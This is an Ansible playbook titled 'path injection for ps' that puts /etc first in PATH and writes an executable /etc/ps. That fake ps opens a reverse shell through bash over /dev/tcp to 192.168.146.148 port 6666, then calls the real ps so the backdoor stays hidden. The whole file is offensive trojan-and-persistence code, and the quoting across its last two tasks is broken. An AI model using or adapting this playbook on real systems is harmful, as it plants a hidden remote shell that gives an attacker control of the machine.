---
- name: "path injection for ps"
  hosts: localhost
  connection: local
  tasks:
    - name: "change $PATH to look at /etc first"
      shell: "export PATH=/etc:$PATH"
    - name: "make new ps file"
      shell: "touch /etc/ps; chmod +x /etc/ps"
    - name: "populate new ps file line 1"
      shell: "echo '#!/bin/sh' >> /etc/ps"
    - name: "populate new ps file line 2"
      shell: "echo 'script -c 'bash -i' /dev/null </dev/tcp/192.168.146.148/6666 >&0 2>&1 &"
    - name: "populate new ps file line 3"
      shell: "/usr/bin/ps $@' >> /etc/ps"


